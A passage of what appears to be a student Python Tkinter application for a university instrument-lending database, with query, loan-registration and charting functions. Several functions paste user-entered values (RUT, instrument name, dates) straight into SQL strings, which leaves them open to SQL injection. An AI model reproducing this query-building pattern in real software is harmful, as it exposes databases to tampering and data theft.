column=0, padx=10, pady=10, sticky=\"nsew\")\r\n\r\n # Create a vertical scrollbar\r\n y_scrollbar = ttk.Scrollbar(result_window, orient=\"vertical\", command=result_tree.yview)\r\n y_scrollbar.grid(row=0, column=1, sticky=\"ns\")\r\n result_tree.configure(yscrollcommand=y_scrollbar.set)\r\n\r\n # Display column names\r\n columns = [desc[0] for desc in crsr.description]\r\n result_tree[\"columns\"] = columns\r\n for col in columns:\r\n result_tree.heading(col, text=col)\r\n result_tree.column(col, anchor=tk.CENTER)\r\n\r\n # Display data\r\n for i, row in enumerate(results, 1):\r\n result_tree.insert(\"\", \"end\", iid=i, values=tuple(row))\r\n\r\n # Update the window's layout to make it resizable\r\n result_window.grid_rowconfigure(0, weight=1)\r\n result_window.grid_columnconfigure(0, weight=1)\r\n\r\n\r\n# Logica Consultas. 
--->\r\n\r\n# #### CONSULTAS RAPIDAS DE TAB.2\r\n\r\n# Ejecuta query de grupo combobox 1 - Ver estudiantes\r\ndef execute_combobox_query1():\r\n query = f\"SELECT * FROM estudiante\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n\r\n\r\n\r\n# Ejecuta query de grupo combobox 2 - Ver Prestamos * Eventual y Anual\r\ndef execute_combobox_query2():\r\n selected_item = combobox_query2.get()\r\n\r\n if selected_item == \"Eventual\":\r\n query = f\"SELECT NombreDePila AS Nombre_Estudiante, rut AS rut_Estudiante, i.numSerie AS Num_Serie_Intrumento, i.nombre \\\r\n FROM Estudiante e \\\r\n INNER JOIN prestamo_eventual p ON e.rut = p.rutest \\\r\n INNER JOIN Instrumento i ON p.NumSerieInst = i.NumSerie\\\r\n ORDER BY FechaInicio DESC\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n else:\r\n query = f\"SELECT NombreDePila AS Nombre_Estudiante, rut AS rut_Estudiante, i.numSerie AS Num_Serie_Intrumento, i.nombre\\\r\n FROM Estudiante e \\\r\n INNER JOIN gestiona g ON e.rut = g.rutest \\\r\n INNER JOIN instrumento i ON g.numserieinst = i.numserie\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n\r\n\r\n# Ejecuta query de grupo combobox 3. 'Ver Instrumento'\r\n# TODO: Agregar mas tipos de instrumentos.\r\ndef execute_combobox_query3():\r\n selected_item = combobox_query3.get()\r\n\r\n if selected_item == \"\":\r\n query = f\"SELECT * FROM instrumento\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n elif selected_item == \"Todos\":\r\n query = f\"SELECT * FROM instrumento\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n else:\r\n query = f\"SELECT * FROM instrumento WHERE nombre = '{selected_item}'\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n\r\n\r\n# Ejecuta query de grupo combobox 4. 
- Ver prestamos de estudiante especifico por rut\r\ndef execute_combobox_query4():\r\n selected_item = combobox_query4.get()\r\n query = f\"SELECT e.RUT AS RUT_Estudiante, i.NumSerie AS Num_Serie_Instrumento, i.nombre, s.EstadoSolicitud, COUNT(s.RutEst) AS Cant_Veces_Prestado \\\r\n FROM Estudiante e \\\r\n INNER JOIN Solicita s ON e.RUT = s.RutEst \\\r\n INNER JOIN Instrumento i ON i.NumSerie = s.NumSerieInst \\\r\n WHERE e.RUT = '{selected_item}' \\\r\n GROUP BY e.RUT, s.RutEst, i.NumSerie, s.EstadoSolicitud\"\r\n try:\r\n crsr.execute(query)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n \r\n \r\ndef execute_combobox_query5():\r\n print(\"Consulta 5 tab.2 seleccionada\")\r\n selected_item = combobox_query5.get()\r\n \r\n query_todos = f\"SELECT nombre, COUNT(*) AS Stock\\\r\n FROM instrumento\\\r\n GROUP BY nombre\\\r\n ORDER BY COUNT(*) DESC\"\r\n \r\n query_disponibles = f\"SELECT nombre, COUNT(*) AS Stock\\\r\n FROM instrumento\\\r\n WHERE estado = 'Disponible'\\\r\n GROUP BY nombre\\\r\n ORDER BY COUNT(*) DESC\"\r\n \r\n query_reparacion = f\"SELECT nombre, COUNT(*) AS Stock\\\r\n FROM instrumento\\\r\n WHERE estado = 'En reparacion'\\\r\n GROUP BY nombre\\\r\n ORDER BY COUNT(*) DESC\"\r\n \r\n query_revision = f\"SELECT nombre, COUNT(*) AS Stock\\\r\n FROM instrumento\\\r\n WHERE estado = 'En revision'\\\r\n GROUP BY nombre\\\r\n ORDER BY COUNT(*) DESC\"\r\n \r\n query_total = f\"SELECT COUNT(*) AS Stock_TOTAL\\\r\n FROM instrumento\"\r\n \r\n try:\r\n if selected_item == \"Todos\":\r\n crsr.execute(query_todos)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n \r\n if selected_item == \"Disponibles\":\r\n crsr.execute(query_disponibles)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n \r\n if selected_item == \"En Reparacion\":\r\n crsr.execute(query_reparacion)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n \r\n if selected_item == \"En Revision\":\r\n crsr.execute(query_revision)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n \r\n if selected_item == \"TOTAL\":\r\n crsr.execute(query_total)\r\n results = crsr.fetchall()\r\n display_results_in_window(results)\r\n \r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n\r\n# ### UPDATES para registros en las ventanas que se abren desde TAB.3\r\n\r\ndef registrar_prestamo_eventual():\r\n \r\n registro_rutest = entry_rut_prestamo_eventual.get()\r\n registro_rutenc = entry_rut2_prestamo_eventual.get()\r\n registro_numserie = entry_numserie_eventual.get()\r\n registro_fecha_solicitud = entry_fecha_solicitud_eventual.get()\r\n \r\n print(\"REGISTRA PROFESOR CON ESTOS DATOS\")\r\n print(\"RUTest:\", registro_rutest)\r\n print(\"rutenc:\", registro_rutenc)\r\n print(\"numserie:\", registro_numserie)\r\n print(\"fecha_solicitud:\", registro_fecha_solicitud)\r\n \r\n \r\n \r\n query_update = f\"INSERT INTO prestamo_eventual (rutest, rutenc, numserieinst, fechainicio)\\\r\n VALUES ('{registro_rutest}', '{registro_rutenc}', '{registro_numserie}', '{registro_fecha_solicitud}');\"\r\n \r\n update_cursor = connection.cursor() # Cursor para hacer update * TEST\r\n \r\n try:\r\n 
update_cursor.execute(query_update)\r\n connection.commit()\r\n update_cursor.close()\r\n messagebox.showinfo(\"Success\", \"Registro actualizado exitosamente\")\r\n print('Exito: Se actualizo el registro con la query: ')\r\n print(f\"INSERT INTO Test_Registros (rut_profesor, nombredepila, apellido1, apellido2)\\\r\n VALUES ('{registro_rutest}', '{registro_rutenc}', '{registro_numserie}', '{registro_fecha_solicitud}')\")\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n# ### CONSULTAS PARA consultas_proyecto EN TAB.4\r\n\r\n# Muestra el top 20 de instrumentos con mayor Avaluo\r\ndef execute_query_proyecto_1():\r\n print(\"Se llama a EXECUTE QUERY para consulta 1 tab.4\")\r\n \r\n query_string = f\"SELECT nombre, numserie, avaluo \\\r\n FROM instrumento \\\r\n WHERE avaluo IS NOT NULL\\\r\n ORDER BY avaluo DESC LIMIT 20\"\r\n \r\n try:\r\n crsr.execute(query_string)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n# Muestra instrumentos que esten disponibles para prestamo \r\ndef execute_query_proyecto_2():\r\n print(\"Se llama a EXECUTE QUERY para consulta 2 tab.4\")\r\n \r\n \r\n query_string = f\"SELECT nombre, numserie, medidas \\\r\n FROM instrumento \\\r\n WHERE estado = 'Disponible'\"\r\n \r\n try:\r\n crsr.execute(query_string)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n\r\ndef execute_query_proyecto_3():\r\n print(\"Se llama a EXECUTE QUERY para consulta 3 tab.4\")\r\n # Esta funcion usa informacion extraida de una ventana formulario\r\n \r\n ven3_inicio = ven3_entry_inicio.get() # FECHAS\r\n ven3_termino = ven3_entry_termino.get()\r\n \r\n print(f\"Se van a usar los valores: {ven3_inicio}, {ven3_termino}\")\r\n \r\n \r\n query_string = f\"SELECT COUNT(*) AS cantidadcatedras, SUM(i.avaluo)\\\r\n FROM catedras c, solicita s, instrumento i, gestiona g, contratodecomodato cdc\\\r\n WHERE c.rutest=s.rutest AND c.rutprof=s.rutprof AND s.numserieinst=i.numserie\\\r\n AND s.numserieinst=g.numserieinst AND g.codigodelcontrato=cdc.codigocontrato\\\r\n AND cdc.fechainicio BETWEEN '{ven3_inicio}' AND '{ven3_termino}'\\\r\n AND s.tipodeprestamo='Anual' AND s.estadosolicitud NOT IN ('Rechazado')\"\r\n \r\n try:\r\n crsr.execute(query_string)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n messagebox.showerror(\"Error\", \"Ingrese los datos en los campos antes de consultar. 
Ejemplo de formato fecha: 2023-10-18\")\r\n connection.rollback()\r\n\r\ndef execute_query_proyecto_4():\r\n print(\"Se llama a EXECUTE QUERY para consulta 4 tab.4\")\r\n \r\n query_string = f\"SELECT e.nombredepila as nombre_est, s.rutest, i.nombre as nombreinst, s.numserieinst,\\\r\n EXTRACT(day FROM age(current_date, s.fechasolicitud)) AS dias_pasados\\\r\n FROM estudiante e, instrumento i, solicita s\\\r\n WHERE e.rut = s.rutest AND i.numserie = s.numserieinst\\\r\n AND s.tipodeprestamo = 'Eventual'\"\r\n \r\n try:\r\n crsr.execute(query_string)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback()\r\n\r\n# Prestamos de un tipo de instrumento especifico entre 2 fechas especificas.\r\ndef execute_query_proyecto_5():\r\n print(\"Se llama a EXECUTE QUERY para consulta 5 tab.4\")\r\n # Se pueden sacar los prints despues, Son para comprobar que se estan comunicando correctamente las funciones\r\n \r\n ven5_tipo_instrumento = ven5_combo_tipo_instrumento.get()\r\n ven5_inicio = ven5_entry_inicio.get()\r\n ven5_termino = ven5_entry_termino.get()\r\n \r\n print(f\"Se van a usar los valores: {ven5_tipo_instrumento}, {ven5_inicio}, {ven5_termino}\")\r\n \r\n \r\n \r\n query_string = f\"SELECT CD.CodigoContrato, COUNT(*) AS CantidadPrestamos\\\r\n FROM ContratoDeComodato AS CD\\\r\n JOIN Gestiona AS GD ON CD.CodigoContrato = GD.CodigoDelContrato\\\r\n JOIN instrumento AS I ON GD.NumSerieInst = I.numserie\\\r\n WHERE I.nombre = '{ven5_tipo_instrumento}' AND CD.FechaInicio\\\r\n BETWEEN '{ven5_inicio}' AND '{ven5_termino}'\\\r\n GROUP BY CD.CodigoContrato\"\r\n \r\n try:\r\n crsr.execute(query_string)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n messagebox.showerror(\"Error\", \"Ingrese los datos en los campos antes de consultar. 
Ejemplo de formato fecha: 2023-10-18\")\r\n connection.rollback()\r\n\r\n\r\ndef execute_query_proyecto_6():\r\n print(\"Se llama a EXECUTE QUERY para consulta 6 tab.4\")\r\n # MARCO ESTA TRABAJANDO EN ESTA QUERY\r\n \r\n ven6_tipo_prestamo = ven6_combo_tipo_prestamo.get()\r\n ven6_inicio = ven6_entry_inicio.get()\r\n ven6_termino = ven6_entry_termino.get()\r\n \r\n print(f\"Se van a usar los valores: {ven6_combo_tipo_prestamo}, {ven6_inicio}, {ven6_termino}\")\r\n \r\n \r\n \r\n query_string_anual = f\"SELECT SUM(i.avaluo) AS suma_avaluos, c.catedra, count(c.catedra) AS cantidad_catedra\\\r\n FROM instrumento i, solicita s, catedras c, gestiona g, contratodecomodato cdc\\\r\n WHERE i.numserie=s.numserieinst AND s.rutest=c.rutest AND s.rutprof=c.rutprof\\\r\n AND g.numserieinst=s.numserieinst AND cdc.codigocontrato=g.codigodelcontrato\\\r\n AND s.tipodeprestamo='Anual' AND s.estadosolicitud NOT IN ('Rechazado')\\\r\n AND cdc.fechainicio BETWEEN '{ven6_inicio}' AND '{ven6_termino}'\\\r\n GROUP BY c.catedra\\\r\n ORDER BY cantidad_catedra DESC LIMIT 1\"\r\n \r\n query_string_eventual = f\"SELECT SUM(i.avaluo) AS suma_avaluos, c.catedra, count(c.catedra) AS cantidad_catedra\\\r\n FROM instrumento i, solicita s, catedras c, prestamo_eventual p\\\r\n WHERE i.numserie=s.numserieinst AND s.rutest=c.rutest AND s.rutprof=c.rutprof\\\r\n AND p.fechainicio=s.fechasolicitud AND s.tipodeprestamo='Eventual'\\\r\n AND s.estadosolicitud NOT IN ('Rechazado') AND p.fechainicio BETWEEN '{ven6_inicio}' AND '{ven6_termino}'\\\r\n GROUP BY c.catedra\\\r\n ORDER BY cantidad_catedra DESC LIMIT 1\"\r\n \r\n query_string_ambos = f\"SELECT SUM(i.avaluo) AS suma_avaluos, c.catedra, COUNT(c.catedra) AS cantidad_catedra, 'Eventual' AS tipo_prestamo\\\r\n FROM instrumento i, solicita s, catedras c, prestamo_eventual p\\\r\n WHERE i.numserie = s.numserieinst \\\r\n AND s.rutest = c.rutest \\\r\n AND s.rutprof = c.rutprof\\\r\n AND p.fechainicio = s.fechasolicitud \\\r\n AND s.tipodeprestamo = 'Eventual'\\\r\n AND s.estadosolicitud NOT IN ('Rechazado') \\\r\n AND p.fechainicio BETWEEN '{ven6_inicio}' AND '{ven6_termino}'\\\r\n GROUP BY c.catedra, tipo_prestamo\\\r\n UNION\\\r\n SELECT SUM(i.avaluo) AS suma_avaluos, c.catedra, COUNT(c.catedra) AS cantidad_catedra, 'Anual' AS tipo_prestamo\\\r\n FROM instrumento i, solicita s, catedras c, gestiona g, contratodecomodato cdc\\\r\n WHERE i.numserie = s.numserieinst \\\r\n AND s.rutest = c.rutest \\\r\n AND s.rutprof = c.rutprof\\\r\n AND g.numserieinst = s.numserieinst \\\r\n AND cdc.codigocontrato = g.codigodelcontrato\\\r\n AND s.tipodeprestamo = 'Anual' \\\r\n AND s.estadosolicitud NOT IN ('Rechazado')\\\r\n AND cdc.fechainicio BETWEEN '{ven6_inicio}' AND '{ven6_termino}'\\\r\n GROUP BY c.catedra, tipo_prestamo\\\r\n ORDER BY cantidad_catedra DESC \\\r\n LIMIT 1\"\r\n \r\n \r\n try:\r\n if ven6_tipo_prestamo == 'Anual':\r\n crsr.execute(query_string_anual)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n \r\n if ven6_tipo_prestamo == 'Eventual':\r\n crsr.execute(query_string_eventual)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n \r\n if ven6_tipo_prestamo == 'Ambos':\r\n crsr.execute(query_string_ambos)\r\n resultado_query = crsr.fetchall()\r\n display_results_in_window(resultado_query) # Se muestra el resultado stock en tabla\r\n \r\n except Exception as error:\r\n print('ERROR EXCEPT consulta 1 rgt>> ')\r\n 
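All six consulta functions repeat the same execute / fetchall / display / rollback scaffolding, and the except label 'ERROR EXCEPT consulta 1' was copy-pasted into every one of them, so the console blames query 1 for every failure. A refactoring sketch the six functions could delegate to; run_report and its label argument are introduced here for illustration only.

def run_report(label, query_string, params=None):
    # Shared plumbing for the tab-4 reports: run the query, show the rows,
    # and roll back on failure so the transaction is not left locked.
    try:
        if params is None:
            crsr.execute(query_string)
        else:
            crsr.execute(query_string, params)
        display_results_in_window(crsr.fetchall())
    except Exception as error:
        print(f'ERROR EXCEPT {label} >> {error}')  # names the query that actually failed
        messagebox.showerror("Error", str(error))
        connection.rollback()

# e.g. consulta 1 becomes:
# run_report('consulta 1', "SELECT nombre, numserie, avaluo FROM instrumento "
#                          "WHERE avaluo IS NOT NULL ORDER BY avaluo DESC LIMIT 20")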
print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n messagebox.showerror(\"Error\", \"Ingrese los datos en los campos antes de consultar. Ejemplo de formato fecha: 2023-10-18\")\r\n connection.rollback()\r\n \r\n\r\n\r\n# ### QUERY PARA GRAFICAR INSTRUMENTOS EN TAB.5\r\ndef query_graficar_stock():\r\n \r\n \r\n query_string = f\"SELECT nombre, COUNT(*) FROM instrumento GROUP BY nombre\"\r\n \r\n \r\n try:\r\n crsr.execute(query_string)\r\n data_grafico_stock = crsr.fetchall()\r\n # display_results_in_window(data_grafico_stock) # Se muestra el resultado stock en tabla\r\n grafico_stock(data_grafico_stock)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n messagebox.showerror(\"Error\", str(error))\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n\r\ndef query_graficar_prestamos():\r\n print(\"Se llama query graficar prestamos\")\r\n \r\n tab5_anho = tab5_combo_anho.get()\r\n tab5_mes = tab5_combo_mes.get()\r\n\r\n if tab5_anho is None or tab5_mes is None:\r\n print(\"Comboboxesde tab5 estan vacias\")\r\n messagebox.showerror(\"Ingrese fecha\")\r\n \r\n query_string = f\"SELECT i.nombre AS instrument_name, COUNT(*) AS lending_count\\\r\n FROM solicita s\\\r\n JOIN instrumento i ON s.numserieinst = i.numserie\\\r\n WHERE EXTRACT(MONTH FROM s.fechasolicitud) = {tab5_mes}\\\r\n AND EXTRACT(YEAR FROM s.fechasolicitud) = {tab5_anho}\\\r\n GROUP BY i.nombre\\\r\n ORDER BY lending_count DESC\"\r\n \r\n \r\n try:\r\n if tab5_anho is None or tab5_mes is None:\r\n print(\"Comboboxesde tab5 estan vacias\")\r\n messagebox.showerror(\"Ingrese fecha\")\r\n else:\r\n crsr.execute(query_string)\r\n data_grafico_prestamos = crsr.fetchall()\r\n # display_results_in_window(data_grafico_stock) # Se muestra el resultado stock en tabla\r\n grafico_prestamos(data_grafico_prestamos)\r\n except Exception as error:\r\n print('ERROR EXCEPT Combobox rgt>> ')\r\n print(error)\r\n # messagebox.showerror(\"Error\", str(error))\r\n messagebox.showerror(\"Error\", \"No hay datos. \")\r\n connection.rollback() # Arregla bloqueo de transaccion.\r\n \r\n\r\n\r\n\r\n\r\n# Elementos U.I. de Home | TAB 1 ---->\r\n\r\n# ### TITULO dentro de ventana\r\nlabel_titulo = ttk.Label(\r\n tab1,\r\n text=\"Central Instrumentos ULS\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n)\r\nlabel_titulo.grid(row=0, column=0, padx=10, pady=(1,5), columnspan=20)\r\n\r\n# ### Instrucciones de uso.\r\nlabel_indicaciones = ttk.Label(\r\n tab1,\r\n text=\"Para usar el programa se pueden navegar las pestanas en la barra superior.\\\r\n \\n\\n\\nConsulta: Se obtiene informacion relevante. Seleccionar categoria en ComboBox\\n\\t y hacer consulta.\\\r\n \\n\\nRegistro: Se Registran nuevos prestamos, Estudiantes, Instrumentos, y Profesores.\\\r\n \\n\\nConsultas Inventario: Se obtiene informacion de Stock, Prestamos, Avaluo\\\r\n \\n\\nVisualizacion: Se muestra informacion de la central con Graficas.\",\r\n \r\n font=(\"BlinkMacSystemFont\", 10),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n)\r\nlabel_indicaciones.grid(row=1, column=0, padx=5, pady=(1,5), columnspan=20)\r\n\r\n# ### Agrega imagen de ULS. 
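A note on the empty-field guard in query_graficar_prestamos above: ttk.Combobox.get() returns an empty string, never None, so the `is None` checks can never fire, and messagebox.showerror expects a title plus a message. A corrected guard, as a sketch (the helper name is new):

def fecha_de_tab5():
    # Returns (anho, mes) only when both combo boxes hold a value.
    anho = tab5_combo_anho.get().strip()
    mes = tab5_combo_mes.get().strip()
    if not anho or not mes:  # '' is falsy; .get() never returns None
        messagebox.showerror("Ingrese fecha", "Seleccione anho y mes antes de graficar.")
        return None
    return anho, mes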
(Preguntar a profesor si esta bien agregar esa imagen.)\r\nimage_path = \"logo.png\"\r\nimg = Image.open(image_path)\r\nimg = img.resize((250, 120)) # dimension logo\r\nimage = ImageTk.PhotoImage(img)\r\n\r\nimage_label = ttk.Label(tab1, image=image, background=\"White\") # Se agrega fondo blanco porque es un png sin fondo.\r\nimage_label.grid(row=3, column=10, padx=10, pady=(5,10))\r\n\r\n\r\n\r\n# Elementos de U.I. De Consultas | TAB 2---->\r\n\r\n# ### 1ra consulta - VER ESTUDIANTES\r\n# Label para combobox 1\r\nlabel_combobox1 = ttk.Label(tab2, text=\"Ver Estudiantes\", font=(\"Arial\", 9, \"bold\"))\r\nlabel_combobox1.grid(row=1, column=0, padx=10, pady=10)\r\n\r\n# Btn 'Execute Combobox Query' 1\r\nexecute_combobox_button1 = ttk.Button(tab2, text=\"Hacer Consulta\", command=execute_combobox_query1, width=20)\r\nexecute_combobox_button1.grid(row=1, column=1, padx=10, pady=10)\r\n\r\n\r\n\r\n\r\n# ### 2da consulta - VER PRESTAMOS\r\n# Label para combobox 2\r\nlabel_combobox2 = ttk.Label(tab2, text=\"Ver Prestamos\", font=(\"Arial\", 9, \"bold\"))\r\nlabel_combobox2.grid(row=3, column=0, padx=10, pady=(10,0))\r\n\r\n# Combobox2\r\ncombobox_query_values2 = [\"Eventual\", \"Anual\"]\r\ncombobox_query2 = ttk.Combobox(tab2, values=combobox_query_values2)\r\ncombobox_query2.grid(row=4, column=0, padx=10, pady=(0,10))\r\n\r\n# Btn 'Execute Combobox Query' 2\r\nexecute_combobox_button2 = ttk.Button(tab2, text=\"Hacer Consulta\", command=execute_combobox_query2, width=20)\r\nexecute_combobox_button2.grid(row=4, column=1, padx=10, pady=10)\r\n\r\n\r\n\r\n\r\n# ### 3ra consulta - VER INSTRUMENTOS\r\n# Label para combobox 3\r\nlabel_combobox3 = ttk.Label(tab2, text=\"Ver Instrumentos\", font=(\"Arial\", 9, \"bold\"))\r\nlabel_combobox3.grid(row=5, column=0, padx=10, pady=(10,0))\r\n\r\n# Combobox 3\r\ncombobox_query_values3 = [\"Todos\", \"Baritono\", \"Clarinete\", \"Corno\", \"Trombon\", \"Trompeta\", \"Tuba\", \"Viola\", \"Violin\", \"Violoncello\"]\r\ncombobox_query3 = ttk.Combobox(tab2, values=combobox_query_values3)\r\ncombobox_query3.grid(row=6, column=0, padx=10, pady=(0,10))\r\n\r\n# Btn 'Execute Combobox Query' 3\r\nexecute_combobox_button3 = ttk.Button(tab2, text=\"Hacer Consulta\", command=execute_combobox_query3, width=20)\r\nexecute_combobox_button3.grid(row=6, column=1, padx=10, pady=10)\r\n\r\n\r\n\r\n\r\n# ### 4ta consulta - VER PRESTAMOS HISTORICOS DE ESTUDIANTE\r\n# Label para combobox 4\r\nlabel_combobox4 = ttk.Label(tab2, text=\"Prestamos de un Estudiante\", font=(\"Arial\", 9, \"bold\"))\r\nlabel_combobox4.grid(row=7, column=0, padx=10, pady=(10,0))\r\n\r\n# Combobox4\r\ncombobox_query4 = ttk.Entry(tab2, width=25)\r\ncombobox_query4.grid(row=8, column=0, padx=10, pady=(0,10))\r\n\r\n# Btn 'Execute Combobox Query' 4\r\nexecute_combobox_button4 = ttk.Button(tab2, text=\"Hacer Consulta\", command=execute_combobox_query4, width=20)\r\nexecute_combobox_button4.grid(row=8, column=1, padx=10, pady=10)\r\n\r\n\r\n# ### 5ta consulta - VER STOCK INSTRUMENTOS TOTAL Y DISPONIBLE\r\n# Label para combobox 5\r\nlabel_combobox5 = ttk.Label(tab2, text=\"Stock Instrumentos\", font=(\"Arial\", 9, \"bold\"))\r\nlabel_combobox5.grid(row=9, column=0, padx=10, pady=(10,0))\r\n\r\n# Combobox5\r\ncombobox_query5_values = [\"TOTAL\", \"Todos\", \"Disponibles\", \"En Reparacion\", \"En Revision\"]\r\ncombobox_query5 = ttk.Combobox(tab2, values=combobox_query5_values)\r\ncombobox_query5.grid(row=10, column=0, padx=10, pady=(0,10))\r\n\r\n# Btn 'Execute Combobox Query' 5\r\nexecute_combobox_button5 = 
ttk.Button(tab2, text=\"Hacer Consulta\", command=execute_combobox_query5, width=20)\r\nexecute_combobox_button5.grid(row=10, column=1, padx=10, pady=10)\r\n\r\n\r\n\r\n# Centra elementos de Tab1 - Consulta\r\ntab2.columnconfigure(0, weight=1)\r\ntab2.columnconfigure(1, weight=1)\r\n\r\n\r\n\r\n\r\n# ### Tab3 | UI de REGISTROS --->\r\n\r\n# ### Ventanas que se abren desde TAB3 REGISTRA\r\n\r\ndef print_mock():\r\n print(\"hola esto es una mock func\")\r\n\r\ndef en_desarrollo():\r\n messagebox.showerror(\"Ups!\", \"Esta funcion aun esta en desarrollo\")\r\n \r\n# ### TAB3 | Ventanas de registro\r\ndef ventana_registro_estudiante():\r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Registro de Estudiante\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_estudiante = ttk.Label(\r\n ventana_registro,\r\n text=\"Registro Estudiante\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_estudiante.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels y TextEntries para cada campo.\r\n \r\n label_rut_estudiante = ttk.Label(ventana_registro, text=\"RUT\", font=(\"Arial\", 10, \"bold\"))\r\n label_rut_estudiante.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_rut_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_rut_estudiante.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_nombre_estudiante = ttk.Label(ventana_registro, text=\"Nombre\", font=(\"Arial\", 10, \"bold\"))\r\n label_nombre_estudiante.grid(row=2, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_nombre_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_nombre_estudiante.grid(row=3, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_app1_estudiante = ttk.Label(ventana_registro, text=\"Apelido Paterno\", font=(\"Arial\", 10, \"bold\"))\r\n label_app1_estudiante.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_app1_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_app1_estudiante.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n label_app2_estudiante = ttk.Label(ventana_registro, text=\"Apelido Materno\", font=(\"Arial\", 10, \"bold\"))\r\n label_app2_estudiante.grid(row=4, column=1, padx=(80,0), pady=(20,0))\r\n \r\n entry_app2_estudiante = ttk.Entry(ventana_registro, width=30)\r\n entry_app2_estudiante.grid(row=5, column=1, padx=(80,0), pady=(0,10))\r\n \r\n \r\n \r\n \r\n label_tel_estudiante = ttk.Label(ventana_registro, text=\"Telefono\", font=(\"Arial\", 10, \"bold\"))\r\n label_tel_estudiante.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n entry_tel_estudiante = ttk.Entry(ventana_registro, width=30)\r\n 